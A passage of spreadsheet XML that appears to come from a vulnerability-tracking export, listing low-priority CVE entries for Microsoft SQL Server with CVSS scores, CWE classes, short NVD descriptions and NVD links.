        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67389</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67389</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67390</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67390</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67393</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67393</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67641</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67641</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67645</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67645</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67648</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67648</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68776</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68776</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68777</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68777</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68778</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K371" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr"/>
      <c r="Q371" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68778</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68779</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K372" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L372" s="5" t="inlineStr"/>
      <c r="M372" s="5" t="inlineStr"/>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr"/>
      <c r="Q372" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R372" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68779</t>
        </is>
      </c>
    </row>
    <row r="373">
      <c r="A373" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B373" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68780</t>
        </is>
      </c>
      <c r="D373" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E373" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F373" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G373" s="5" t="inlineStr"/>
      <c r="H373" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I373" s="5" t="inlineStr"/>
      <c r="J373" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K373" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L373" s="5" t="inlineStr"/>
      <c r="M373" s="5" t="inlineStr"/>
      <c r="N373" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O373" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P373" s="5" t="inlineStr"/>
      <c r="Q373" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R373" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68780</t>
        </is>
      </c>
    </row>
    <row r="374">
      <c r="A374" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B374" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68781</t>
        </is>
      </c>
      <c r="D374" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E374" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F374" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G374" s="5" t="inlineStr"/>
      <c r="H374" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I374" s="5" t="inlineStr"/>
      <c r="J374" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K374" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L374" s="5" t="inlineStr"/>
      <c r="M374" s="5" t="inlineStr"/>
      <c r="N374" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O374" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P374" s="5" t="inlineStr"/>
      <c r="Q374" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R374" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68781</t>
        </is>
      </c>
    </row>
    <row r="375">
      <c r="A375" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B375" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C375" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68784</t>
        </is>
      </c>
      <c r="D375" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E375" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F375" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G375" s="5" t="inlineStr"/>
      <c r="H375" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I375" s="5" t="inlineStr"/>
      <c r="J375" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K375" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L375" s="5" t="inlineStr"/>
      <c r="M375" s="5" t="inlineStr"/>
      <c r="N375" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O375" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P375" s="5" t="inlineStr"/>
      <c r="Q375" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R375" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S375" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68784</t>
        </is>
      </c>
    </row>
    <row r="376">
      <c r="A376" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B376" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C376" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69297</t>
        </is>
      </c>
      <c r="D376" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E376" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F376" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G376" s="5" t="inlineStr"/>
      <c r="H376" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I376" s="5" t="inlineStr"/>
      <c r="J376" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K376" s="5" t="inlineStr">
        <is>
